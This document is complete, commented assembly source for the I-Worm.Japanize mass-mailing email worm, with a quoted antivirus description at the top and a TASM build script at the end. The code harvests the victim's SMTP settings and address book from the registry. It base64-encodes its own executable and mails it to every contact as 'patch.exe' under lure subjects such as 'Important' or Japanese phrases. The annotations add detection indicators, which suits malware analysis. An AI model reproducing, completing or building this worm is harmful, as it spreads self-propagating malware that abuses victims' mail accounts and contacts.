;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|||
|
;;; I-Worm.Japanize
|
|||
|
;;; XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|||
|
;;;
|
|||
|
;;;
|
|||
|
;;; This has some bugs.
|
|||
|
;;;
|
|||
|
;;; Here TrendMicro description:
|
|||
|
;;; ******************************************************************
|
|||
|
;;; http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=WORM_FBOUND.B&VSect=T
|
|||
|
;;; Details:
|
|||
|
;;;The details of the email this worm arrives with may be as follows:
|
|||
|
;;;
|
|||
|
;;;To: <recipient>
|
|||
|
;;;Subject: <"Important" or random Japanese text(applicable on Japanese supported platforms)>
|
|||
|
;;;Message Body: <blank>
|
|||
|
;;;Attachment: patch.exe
|
|||
|
;;;
|
|||
|
;;;It uses its own SMTP engine and uses the following registry key to retrieve the default SMTP server of the infected system:
|
|||
|
;;;HKEY_CURRENT_USER\Software\Microsoft\
|
|||
|
;;;Internet Account Manager\Accounts\00000001
|
|||
|
;;;
|
|||
|
;;;It uses the following registry key to retrieve email addresses from the infected user's Windows Address Book (WAB):
|
|||
|
;;;HKEY_CURRENT_USER\Software\Microsoft\WAB\
|
|||
|
;;;WAB4\Wab File Name = "<pathname of WAB file>"
|
|||
|
;;;
|
|||
|
;;;The email arrives with the attachment PATCH.EXE. If the email address of its target user ends with the extension .jp, the worm randomly selects a phrase from a list of 17 possible Japanese phrases below, and uses it as the subject of the email:
|
|||
|
;;;
|
|||
|
;;;
|
|||
|
;;;The English translations of the above Japanese text are as follows:
|
|||
|
;;;Re: the issue that you mentioned
|
|||
|
;;;Re: important
|
|||
|
;;;Re: long time no see
|
|||
|
;;;Re: top secret
|
|||
|
;;;Re: Hello
|
|||
|
;;;Re: important information
|
|||
|
;;;Re: data
|
|||
|
;;;the issue that you mentioned
|
|||
|
;;;important
|
|||
|
;;;long time no see
|
|||
|
;;;top secret
|
|||
|
;;;hello
|
|||
|
;;;important information
|
|||
|
;;;data
|
|||
|
;;;frog
|
|||
|
;;;shit
|
|||
|
;;;shit
|
|||
|
;;;
|
|||
|
;;;Otherwise, it uses the subject "Important."
|
|||
|
;;;
|
|||
|
;;;This non-destructive worm does not drop files or create any registry entries. Its propagation depends on the execution of the file attachment in the email.
|
|||
|
;;;
|
|||
|
;;;The following text strings are found in the worm body:
|
|||
|
;;;
|
|||
|
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
|
|||
|
;;;<3B>eXXXXX I-Worm.Japanize XXXXX<58>f
|
|||
|
;;;<3B>eXXXXXXXXXXXXXXXXXXXXXXX<58>f
|
|||
|
;;;
|
|||
|
;;;
|
|||
|
|
|||
|
; Assembler: Borland TASM, MASM-style syntax with TASM extensions (`locals`,
; `jumps`, `arg`, `proc pascal`), 32-bit flat model, Win32 PE target.  The
; forge's "NASM" tag is wrong.  All Win32/Winsock calls go through imports
; resolved by import32.lib (see the build recipe at the end of the file).
.586p
.model flat
locals ; enables @@-prefixed local labels, scoped to the preceding global label/proc
jumps  ; lets TASM rewrite out-of-range conditional jumps

;;; some lazy shit
; callW NAME: declare NAME as an external procedure and call it.  Every API
; used below goes through this macro, so the binary's import table is simply
; the set of NAMEs used here (RegOpenKeyExA, CreateFileMappingA, gethostbyname,
; send, ...) - handy for static triage.
callW macro @@@x
extrn @@@x:proc
call @@@x
endm

ofs equ offset

dwo equ dword ptr
wo equ word ptr
by equ byte ptr

HKEY_CURRENT_USER EQU 80000001h
CRLF equ <13,10>
rdtsc equ <dw 310fh> ; raw opcode bytes 0F 31 (RDTSC): this TASM has no mnemonic for it
AF_INET equ 2
SOCK_STREAM equ 1

FILE_ATTRIBUTE_NORMAL EQU 00000080h
GENERIC_READ EQU 80000000h
GENERIC_WRITE EQU 40000000h
PAGE_READONLY EQU 00000002h
PAGE_READWRITE EQU 00000004h
FILE_MAP_READ EQU 00000004h
OPEN_EXISTING EQU 00000003h
GHND EQU 042h ; GMEM_MOVEABLE | GMEM_ZEROINIT
FILE_SHARE_READ EQU 00000001h
FILE_SHARE_WRITE EQU 00000002h
|
|||
|
|
|||
|
|
|||
|
;;; ----------------------------------------------------------------
|
|||
|
.data
; ---- registry lookups (filled in by get_some_info) ----
hReg dd ?; registry handle
str_SMInternetAccountManager db 'Software\Microsoft\Internet Account Manager',0
; Intentionally not NUL-terminated: AccountIdx follows immediately, so once the
; "Default Mail Account" string has been read into it the two together form the
; subkey path "...\Accounts\<index>" that get_some_info opens next.
str_SMIAccounts db 'Software\Microsoft\Internet Account Manager\Accounts\'
AccountIdx db 9 dup(?); account index
bufsiz_accountidx dd 9; size (in/out: RegQueryValueExA writes back the actual length)

str_DMA db 'Default Mail Account',0
str_SMTPNAME db 'SMTP Server',0
str_SMTPEmailAddr db 'SMTP Email Address',0
str_SMWab4 db 'Software\Microsoft\WAB\WAB4\Wab File Name',0 ; opened as a key; its default value is read


SMTP_Server db 50 dup(?) ; default smtp server
bufsiz_SMTPSERVER dd 50
morons_Mailaddr db 256 dup(?) ; mail address of moron :)  (the victim's own address; used as MAIL FROM / FROM:)
bufsiz_morons_mailaddr dd 256
wab4_path db 260 dup(?); wab file path
bufsiz_wab4_path dd 260

buffer db 1000 dup(?) ; WSADATA scratch for WSAStartup (see start)

; ---- Windows Address Book mapping (open_wab / spread) ----
hwab4file dd ? ; wab4 file handle
hwab4map dd ? ; file-mapping handle
hwab4mapview dd ? ; MapViewOfFile base address (handed to CloseHandle in start, not UnmapViewOfFile)

; ---- own image, re-read for the attachment (create_base64enc) ----
myfilename db 260 dup(?) ; handle of myself  (actually the full path from GetModuleFileNameA)
hmyfile dd ?
fsize dd ? ; file size

hmemout0 dd ? ; GlobalAlloc handle of the raw image copy
ptr_myself dd ? ; ...and its locked pointer
hmemout dd ? ; globalalloc (base64 output, sized 2*fsize)
ptr_base64buf dd ? ; globallock

target_mailaddr db 48h dup(?) ; narrowed copy of a UTF-16 WAB entry (written by spread)

; ---- socket state (spread2 / g_send / g_recv) ----
sockaddr_in label byte ;
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup(?)
len_sockaddr_in = $ - ofs sockaddr_in

sock dd ? ; socket descriptor

recv_buffer db 1024 dup(?) ; recv buffer (also borrowed as ReadFile's lpNumberOfBytesRead in create_base64enc)

jflag dd 0 ; japanese or not (set per recipient by sendmail when the address ends in ".jp")

; ---- SMTP dialogue fragments.  Static/network indicators: "HELO localhost",
; the fixed MIME boundary below, attachment name patch.exe,
; Content-Type application/x-msdownload, the =?ISO-2022-JP?B? subject prefix. ----
smtp_HELO db 'HELO localhost',CRLF
len_smtp_HELO = $ - ofs smtp_HELO
smtp_MAIL_FROM db 'MAIL FROM: '
len_smtp_MAIL_FROM = $ - ofs smtp_MAIL_FROM
;crlf
smtp_RCPT_TO db 'RCPT TO: '
len_smtp_RCPT_TO = $ - ofs smtp_RCPT_TO
;crlf
smtp_DATA db 'DATA',CRLF
len_smtp_DATA = $ - ofs smtp_DATA
smtp_BODY_FROM db 'FROM: '
len_smtp_BODY_FROM = $ - ofs smtp_BODY_FROM
smtp_BODY_TO db CRLF,'TO: '
len_smtp_BODY_TO = $ - ofs smtp_BODY_TO
smtp_BODY_SUBJECT db CRLF,'SUBJECT: Important',CRLF ; subject for non-.jp recipients
len_smtp_BODY_SUBJECT = $ - ofs smtp_BODY_SUBJECT

smtp_DOT_CRLF db '.',CRLF ; end of DATA
len_smtp_DOT_CRLF = $ - ofs smtp_DOT_CRLF
smtp_QUIT db 'QUIT',CRLF
len_smtp_QUIT = $ - ofs smtp_QUIT

smtp_crlf db CRLF

; MIME skeleton: an empty text part, then the headers of the attachment part;
; sendmail transmits the base64 buffer right after this block.
smtp_MIME_h db 'MIME-Version: 1.0',CRLF
db 'Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"',CRLF
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: text/plain; charset=iso-2022-jp',CRLF
db 'Content-Transfer-Encoding: 7bit',CRLF
db 'Content-Description: Mail message body',CRLF
db CRLF
db CRLF ; text (the message body is empty)
db CRLF
db '--Boundary-a8dfidaoRadvfuck',CRLF
db 'Content-Type: application/x-msdownload; name="patch.exe"',CRLF
db 'Content-Disposition: attachment; filename="patch.exe"',CRLF
db 'Content-Transfer-Encoding: BASE64',CRLF
db CRLF
len_smtp_MIME_h = $ - ofs smtp_MIME_h
;; base64 body
smtp_MIME_e db CRLF,'--Boundary-a8dfidaoRadvfuck--',CRLF,CRLF
len_smtp_MIME_e = $ - ofs smtp_MIME_e

r_seed dd 10987293h ; random seed (overwritten with GetTickCount at start)


smtp_jsubject_1 db CRLF,'SUBJECT: =?ISO-2022-JP?B?' ; RFC 2047 encoded-word prefix
len_smtp_jsubject_1 = $ - ofs smtp_jsubject_1
smtp_jsubject_2 db '?=',CRLF
len_smtp_jsubject_2 = $ - ofs smtp_jsubject_2


;;; japanese subjects table
; Pointer table of pre-encoded (base64 of ISO-2022-JP) subject strings;
; sendmail picks one by an index from rng.  English meanings are listed in
; the file header.
japanese_subjects label byte
dd ofs js_01
dd ofs js_02
dd ofs js_03
dd ofs js_04
dd ofs js_05
dd ofs js_06
dd ofs js_07
dd ofs js_08
dd ofs js_09
dd ofs js_10
dd ofs js_11
dd ofs js_12
dd ofs js_13
dd ofs js_14
dd ofs js_15
dd ofs js_16
dd ofs js_17
num_of_jsub = ($ - ofs japanese_subjects)/4
; The trailing comments were Shift-JIS subject text and are garbled in this
; copy.  js_02/04/06/08/10/12/14 are the preceding entry prefixed with "Re:"
; ('UmU6' is base64 for "Re:").
js_01 db 'GyRCPUVNVxsoQg==',0 ; (garbled Shift-JIS)
js_02 db 'UmU6GyRCPUVNVxsoQg==',0; Re: + js_01
js_03 db 'GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; (garbled Shift-JIS)
js_04 db 'UmU6GyRCPUVNVyRKJCpDTiRpJDsbKEI=',0; Re: + js_03
js_05 db 'GyRCTmMkTjdvGyhC',0 ; (garbled Shift-JIS)
js_06 db 'UmU6GyRCTmMkTjdvGyhC',0; Re: + js_05
js_07 db 'GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; (garbled Shift-JIS)
js_08 db 'UmU6GyRCJCo1VyQ3JFYkaiRHJDkbKEI=',0; Re: + js_07
js_09 db 'GyRCJDMkcyRLJEEkTxsoQg==',0; (garbled Shift-JIS)
js_10 db 'UmU6GyRCJDMkcyRLJEEkTxsoQg==',0; Re: + js_09
js_11 db 'GyRCNktIaxsoQg==',0 ; (garbled Shift-JIS)
js_12 db 'UmU6GyRCNktIaxsoQg==',0; Re: + js_11
js_13 db 'GyRCO3FOQRsoQg==',0 ; (garbled Shift-JIS)
js_14 db 'UmU6GyRCO3FOQRsoQg==',0; Re: + js_13
js_15 db 'GyRCMz8bKEI=',0 ; (garbled Shift-JIS)
js_16 db 'GyRCJSYlYxsoQlI=',0 ; (garbled Shift-JIS)
js_17 db 'GyRCJCYkcyQzGyhC',0 ; (garbled Shift-JIS; never selected, see sendmail)
|
|||
|
|
|||
|
.code
|
|||
|
; Entry point.  Single pass, no persistence, no dropped files:
;   seed rng -> registry harvest (get_some_info) -> WSAStartup -> map the WAB
;   (open_wab) -> base64 own image (create_base64enc) -> mail every WAB entry
;   (spread) -> release memory/handles -> WSACleanup -> ExitProcess(0).
; Nothing here is callee-saved; the helpers use ebx as a zero register.
start:
callW GetTickCount
mov dwo [r_seed],eax ; seed = tick count (replaces the static initial value)
jmp @@go ; hop over the embedded signature strings
;; signature :)
; the static identifier quoted in the AV description in the file header
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
db 'XXXXX I-Worm.Japanize XXXXX',0
db 'XXXXXXXXXXXXXXXXXXXXXXXXXXX',0
@@go:
call get_some_info ; eax = 0 / -1; the result is not examined here

push ofs buffer ; lpWSAData -> the 1000-byte scratch buffer
push 0101h ; Winsock 1.1
callW WSAStartup
test eax,eax
jnz exit

call open_wab ; eax = 0 / -1
test eax,eax
jnz clean_sock ; no address book -> nothing to do

call create_base64enc ; eax = 0 / -1, not examined

call spread

free_mem:
push dwo [ptr_base64buf]
callW GlobalUnlock
push dwo [hmemout]
callW GlobalFree

close_wab4:
; three values pushed, three CloseHandle calls: the view base address
; (hwab4mapview) goes to CloseHandle first, then hwab4map, then hwab4file.
push dwo [hwab4file]
push dwo [hwab4map]
push dwo [hwab4mapview]
callW CloseHandle
callW CloseHandle
callW CloseHandle

clean_sock:
callW WSACleanup

exit:
push 0
callW ExitProcess
|
|||
|
|
|||
|
|
|||
|
|
|||
|
spread:
;; lifewire ;)
; Walk the address entries of the mapped WAB file and hand each one to spread2.
; Assumed WAB4 layout, hard-coded and not validated: dword at +64h = entry
; count, dword at +60h = offset of the first entry, entries stepped by 24h
; bytes (44h when the entry is detected as UTF-16).  -- TODO confirm against a WAB4 dump
; Clobbers eax, ecx, esi, edi plus whatever spread2/sendmail clobber.
mov esi,dwo [hwab4mapview]
mov ecx,[esi+64h] ; num of addr
jecxz @@exit
add esi,[esi+60h] ; ptr to addr

@@spread_loop:
push ecx ; remaining entries (spread2 does not preserve ecx)

mov eax,esi ; eax = address string passed to spread2
cmp by [esi+1],0 ; second byte zero -> treat the entry as UTF-16
jne @@nounicode
push esi
lea edi,target_mailaddr
push edi

push 48h
pop ecx
@@1:
lodsw ; narrowing copy: keep the low byte of each UTF-16 unit
stosb ; fills all 48h bytes of target_mailaddr; no explicit NUL is added
loop @@1

pop eax ; eax = target_mailaddr (the narrowed copy)
pop esi
add esi,20h

@@nounicode:
call spread2 ; eax = address pointer (assumed NUL-terminated; lstrlen is applied to it downstream)

add esi,24h
pop ecx
loop @@spread_loop

@@exit:
ret
|
|||
|
|
|||
|
|
|||
|
spread2:
; Mail one recipient.  In: eax = recipient address (ASCIIZ).  Resolves the
; SMTP host harvested from the registry, connects to TCP/25, then runs the
; sendmail dialogue.  Preserves esi only.  The socket created here is never
; closed (no closesocket anywhere in this file).
push esi
mov esi,eax ; now esi=email addr

push 0 ; protocol 0
push 1 ; SOCK_STREAM (literal; the equate is not used)
push 2 ; AF_INET
callW socket
mov dwo [sock],eax ; not checked for INVALID_SOCKET

mov wo [sin_family],AF_INET
mov ax,25
xchg al,ah ; htons(25)
mov wo [sin_port],ax

push ofs SMTP_Server
callW gethostbyname ; DNS lookup of the victim's configured SMTP server
test eax,eax
jz @@exit

mov eax,[eax+12] ; hostent.h_addr_list
mov eax,[eax] ; first in_addr*
mov eax,[eax] ; the IPv4 address (already network byte order)

mov dwo [sin_addr],eax
push len_sockaddr_in
lea eax,sockaddr_in
push eax
push dwo [sock]
callW connect
test eax,eax
jnz @@exit

call sendmail ; esi = recipient

@@exit:
pop esi
ret
|
|||
|
|
|||
|
|
|||
|
;;; ---
|
|||
|
;;; reg stuff
|
|||
|
get_some_info:
; Harvest mail settings from the registry (Internet Account Manager + Windows
; Address Book).  Fills SMTP_Server, morons_Mailaddr (the victim's own address)
; and wab4_path.  Out: eax = 0 on success, -1 on the first API failure.
; Clobbers ebx (held at 0 as a cheap NULL/0 source).  On the error path the
; key currently open in hReg is not closed.
; Host-side observables: reads of HKCU\Software\Microsoft\Internet Account
; Manager\Accounts\<idx> and HKCU\Software\Microsoft\WAB\WAB4\Wab File Name.
xor ebx,ebx

; RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Internet Account Manager", 0, 1 /*KEY_QUERY_VALUE*/, &hReg)
push ofs hReg
push 1
push ebx
push ofs str_SMInternetAccountManager
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error

; RegQueryValueExA(hReg, "Default Mail Account", 0, 0, AccountIdx, &bufsiz_accountidx)
; AccountIdx sits directly behind str_SMIAccounts, completing the subkey path opened next.
push ofs bufsiz_accountidx
push ofs AccountIdx
push ebx
push ebx
push ofs str_DMA
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error

push dwo [hReg]
callW RegCloseKey

; RegOpenKeyExA(HKCU, "Software\Microsoft\Internet Account Manager\Accounts\<idx>", 0, KEY_QUERY_VALUE, &hReg)
push ofs hReg
push 1
push ebx
push ofs str_SMIAccounts
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error

; "SMTP Server" -> SMTP_Server
push ofs bufsiz_SMTPSERVER
push ofs SMTP_Server
push ebx
push ebx
push ofs str_SMTPNAME
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error

; "SMTP Email Address" -> morons_Mailaddr
push ofs bufsiz_morons_mailaddr
push ofs morons_Mailaddr
push ebx
push ebx
push ofs str_SMTPEmailAddr
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error

push dwo [hReg]
callW RegCloseKey

; RegOpenKeyExA(HKCU, "Software\Microsoft\WAB\WAB4\Wab File Name", 0, KEY_QUERY_VALUE, &hReg)
push ofs hReg
push 1
push ebx
push ofs str_SMWab4
push HKEY_CURRENT_USER
callW RegOpenKeyExA
test eax,eax
jnz @@error

; RegQueryValueExA(hReg, NULL /*default value*/, 0, 0, wab4_path, &bufsiz_wab4_path)
push ofs bufsiz_wab4_path
push ofs wab4_path
push ebx
push ebx
push ebx
push dwo [hReg]
callW RegQueryValueExA
test eax,eax
jnz @@error

push dwo [hReg]
callW RegCloseKey
xor eax,eax
ret
@@error:
xor eax,eax
dec eax ; eax = -1
ret
|
|||
|
|
|||
|
|
|||
|
open_wab:
; Open and map the Windows Address Book file named in wab4_path, read-only.
; Out: eax = 0 with hwab4file/hwab4map/hwab4mapview set, or -1 if CreateFileA
; failed.  The CreateFileMappingA and MapViewOfFile results are stored
; without being checked.  Clobbers ebx (zero register).
xor ebx,ebx
; CreateFileA(wab4_path, GENERIC_READ, FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_WRITE
push GENERIC_READ
push ofs wab4_path
callW CreateFileA
inc eax ; INVALID_HANDLE_VALUE (-1) becomes 0
jz @@error
dec eax
mov dwo [hwab4file],eax

; CreateFileMappingA(hFile, NULL, PAGE_READONLY, 0, 0, NULL) -- whole file
push ebx
push ebx
push ebx
push PAGE_READONLY
push ebx
push eax
callW CreateFileMappingA
mov dwo [hwab4map],eax

; MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0) -- whole file
push ebx
push ebx
push ebx
push FILE_MAP_READ
push eax
callW MapViewOfFile
mov dwo [hwab4mapview],eax
xor eax,eax
ret
@@error:
xor eax,eax
dec eax ; eax = -1
ret
|
|||
|
|
|||
|
create_base64enc:
; Read this process's own executable into memory and base64-encode it into a
; second buffer (ptr_base64buf), which sendmail later transmits as patch.exe.
; Out: eax = 0 on success, -1 if the file could not be opened or read.
; Clobbers ebx (zero register) and everything base64encode clobbers.  The raw
; copy (hmemout0) is released here; the base64 buffer (hmemout) by start.
; GetModuleFileNameA(NULL, myfilename, 260)
push 260
push ofs myfilename
push 0
callW GetModuleFileNameA

xor ebx,ebx
; CreateFileA(myfilename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
push ebx
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push ebx
push FILE_SHARE_READ
push GENERIC_READ
push ofs myfilename
callW CreateFileA
inc eax ; INVALID_HANDLE_VALUE (-1) becomes 0
jz @@error
dec eax
mov dwo [hmyfile],eax

; GetFileSize(hmyfile, NULL)
push 0
push dwo [hmyfile]
callW GetFileSize
mov dwo [fsize],eax

add eax,100h ; slack: base64encode's lodsd reads one byte past the last 3-byte group
push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout0],eax

push eax
callW GlobalLock
mov dwo [ptr_myself],eax

; ReadFile(hmyfile, ptr_myself, fsize, &recv_buffer /*lpNumberOfBytesRead, borrowed*/, NULL)
push 0
push ofs recv_buffer
push dwo [fsize]
push eax
push dwo [hmyfile]
callW ReadFile
test eax,eax
jz @@eexit

push 0
push dwo [hmyfile]
callW GetFileSize
push eax ; save size
; NOTE(review): the dword pushed above is never popped explicitly; together
; with the two pushes before `call base64encode` it appears to be consumed by
; the argument cleanup TASM emits for a `proc pascal` -- verify.

shl eax,1 ; eax*2 -- output buffer sized 2 * file size

push eax
push GHND
callW GlobalAlloc
mov dwo [hmemout],eax

push eax
callW GlobalLock
mov dwo [ptr_base64buf],eax

; pop ebx ; restore size
; push ebx ; size
push eax ; base64 output pointer
push dwo [ptr_myself] ; raw image pointer
call base64encode


push dwo [hmyfile]
callW CloseHandle

push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree

xor eax,eax
ret

@@eexit:
; ReadFile failed: release the raw copy, then fall through to @@error
push dwo [hmyfile]
callW CloseHandle

push dwo [ptr_myself]
callW GlobalUnlock
push dwo [hmemout0]
callW GlobalFree

@@error:
xor eax,eax
dec eax ; eax = -1
ret
|
|||
|
|
|||
|
base64encode proc pascal
; Plain base64 (standard alphabet in @@b64table, '=' padding), emitted as ONE
; unbroken line with no 76-column folding, followed by a dword holding the
; padding and NUL bytes so that lstrlen() finds the end.  TASM `pascal`
; convention: the arguments are declared in push order and the epilogue
; TASM generates for `ret` removes them.
; Per outer iteration: load 1/2/3 source bytes (lodsb / lodsw / lodsd then
; back up one), bswap so the first byte is most significant, then emit ecx
; (2/3/4) six-bit groups via the table.  edx carries the padding for the
; final stosd: "==" when 1 byte remained, "=" when 2, none when 3.
; Clobbers eax, ebx, ecx, edx, esi, edi.
arg @@src
arg @@dest
arg @@srclen

mov esi,dwo [@@src]
mov edi,dwo [@@dest]

@@b64loop:
xor eax,eax
cmp dwo [@@srclen],1
jne @@srclen2
lodsb ; 1 byte left -> 2 output chars + "=="
push 2
pop ecx
mov edx,03D3Dh ; ==
dec dwo [@@srclen]
jmp @@b64next

@@srclen2:
cmp dwo [@@srclen],2
jne @@srclen3
lodsw ; 2 bytes left -> 3 output chars + "="
push 3
pop ecx
push 03dh
pop edx ; "="
sub dwo [@@srclen],2
jmp @@b64next
@@srclen3:
lodsd ; 3+ bytes left: read 4, step back one (reads one byte past the group)
push 4
pop ecx
xor edx,edx ; no padding
dec esi
sub dwo [@@srclen],3

@@b64next:
bswap eax ; first source byte now in bits 31..24

@@b64n_loop:
mov ebx,eax
and eax,0FC000000h ; top 6 bits
rol eax,6 ; ...rotated down to bits 5..0 (index 0..63)
mov al,[@@b64table + eax]
stosb
mov eax,ebx
shl eax,6 ; next 6-bit group to the top
dec ecx
jnz @@b64n_loop

cmp dwo [@@srclen],0
ja @@b64loop ; unsigned compare: loop while bytes remain

mov eax,edx
stosd ; padding ('=' / '==') plus NUL bytes; terminates the string
ret

@@b64table db "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
endp
|
|||
|
|
|||
|
|
|||
|
g_send:
;; in
;; ecx = size
;; esi = ptr to data
;; out
;; eax = ret value of send()
; send(sock, esi, ecx, 0).  No loop for short sends and the result is not
; checked by any caller.  Preserves esi (send is stdcall; ecx/edx are clobbered).
push 0
push ecx
push esi
push dwo [sock]
callW send
ret
|
|||
|
|
|||
|
g_recv:
;; out
;; error -> eax=-1 success -> eax = 0
; Drain one server reply: recv(sock, recv_buffer, 1024, 0), repeated while a
; call returns exactly 1024 bytes.  SOCKET_ERROR (-1) -> eax = -1; anything
; else, including 0 (peer closed), -> eax = 0.  The reply text (SMTP status
; codes) is never inspected; no caller checks eax either.
@@again:
push 0
push 1024
push ofs recv_buffer
push dwo [sock]
callW recv
inc eax ; SOCKET_ERROR (-1) becomes 0
jz @@recv_error
cmp eax,1024
jz @@again
xor eax,eax
ret
@@recv_error:
xor eax,eax
dec eax ; eax = -1
ret
|
|||
|
|
|||
|
|
|||
|
sendmail:
;; yea. lame routine ;)
; Run the whole SMTP session for one recipient on the already-connected
; socket.  In: esi = recipient address (ASCIIZ).  Sends, in order: HELO
; localhost, MAIL FROM: <own address>, RCPT TO: <recipient>, DATA, the
; FROM:/TO:/SUBJECT: headers, the MIME skeleton with the base64 image as
; patch.exe, ".", QUIT.  Every reply is read with g_recv but never checked,
; so the session is fire-and-forget.  Preserves esi.
; Wire-level markers for detection: "HELO localhost", the fixed boundary
; "Boundary-a8dfidaoRadvfuck", "SUBJECT: Important" or a
; "=?ISO-2022-JP?B?" subject, attachment patch.exe.
push esi ; mail addr
mov dwo [jflag],0 ; flag for .jp
;;
call g_recv ; server banner

;;
lea esi,smtp_HELO
mov ecx,len_smtp_HELO
call g_send

call g_recv

;;
lea esi,smtp_MAIL_FROM
mov ecx,len_smtp_MAIL_FROM
call g_send

push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send ; victim's own address, no angle brackets
mov ecx,2
lea esi,smtp_crlf
call g_send

call g_recv
;;
mov ecx,len_smtp_RCPT_TO
lea esi,smtp_RCPT_TO
call g_send

pop esi
push esi ; recipient stays on the stack for later use

push esi
callW lstrlen
push eax ; save
mov ecx,eax
call g_send ; recipient address

mov ecx,2
lea esi,smtp_crlf
call g_send

call g_recv

;; .jp?
pop eax ; len of mail address
pop esi
push esi ; mail address
add esi,eax
sub esi,3
cmp dwo [esi],00706a2eh ; .jp? -- bytes 2E 6A 70 00 = ".jp" + NUL at the end of the address
jne @@1
inc dwo [jflag]
@@1:
;;

lea esi,smtp_DATA
mov ecx,len_smtp_DATA
call g_send

call g_recv
;;

lea esi,smtp_BODY_FROM
mov ecx,len_smtp_BODY_FROM
call g_send

push ofs morons_Mailaddr
callW lstrlen
mov ecx,eax
lea esi,morons_Mailaddr
call g_send

lea esi,smtp_BODY_TO
mov ecx,len_smtp_BODY_TO
call g_send

pop esi
push esi

push esi
callW lstrlen
mov ecx,eax
call g_send ; TO: recipient

cmp dwo [jflag],0
jnz @@jsubject

mov ecx,len_smtp_BODY_SUBJECT
lea esi,smtp_BODY_SUBJECT
call g_send ; "SUBJECT: Important"
jmp @@body

@@jsubject:
;; gen subject
mov ecx,len_smtp_jsubject_1
lea esi,smtp_jsubject_1
call g_send

mov esi,(num_of_jsub-1) ; range 16 -> rng yields 0..15, so js_17 is never chosen
call rng
lea esi,japanese_subjects
mov esi,dwo [esi+eax*4]
push esi
callW lstrlen
mov ecx,eax
call g_send ; pre-encoded subject text

mov ecx,len_smtp_jsubject_2
lea esi,smtp_jsubject_2
call g_send



@@body:
lea esi,smtp_MIME_h
mov ecx,len_smtp_MIME_h
call g_send

mov esi,dwo [ptr_base64buf]
push esi
push esi
callW lstrlen ; relies on the NUL bytes base64encode appends
pop esi
mov ecx,eax
call g_send ; the entire base64 image in one send

lea esi,smtp_MIME_e
mov ecx,len_smtp_MIME_e
call g_send


mov ecx,len_smtp_DOT_CRLF
lea esi,smtp_DOT_CRLF
call g_send

call g_recv
;;

mov ecx,len_smtp_QUIT
lea esi,smtp_QUIT
call g_send

call g_recv
pop esi

ret
|
|||
|
|
|||
|
|
|||
|
rng:
;; in
;; esi = range
;; out
;; eax = random number
; Returns an unsigned value in [0, esi).  Each call mixes the timestamp
; counter (rdtsc is emitted as raw bytes 0F 31, see the equate) into r_seed.
; esi = 0 would raise a divide fault; the only caller passes num_of_jsub-1.
; Clobbers edx; writes r_seed.
rdtsc
xor eax,edx ; low half ^ high half of the TSC
imul eax,dwo [r_seed]
dec eax
mov dwo [r_seed],eax
xor edx,edx ; edx:eax / esi
div esi
mov eax,edx ; remainder
ret
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
*************************************************************************
|
|||
|
|
|||
|
@ECHO OFF
REM Build recipe that shipped with the source: Borland TASM32 + TLINK32.
REM -Tpe selects a Win32 PE target; import32.lib resolves the Win32/Winsock
REM imports declared through the callW macro in japanize.asm.
TASM32 /ml /m /z japanize.asm,japanize.obj
TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib
DEL *.OBJ
|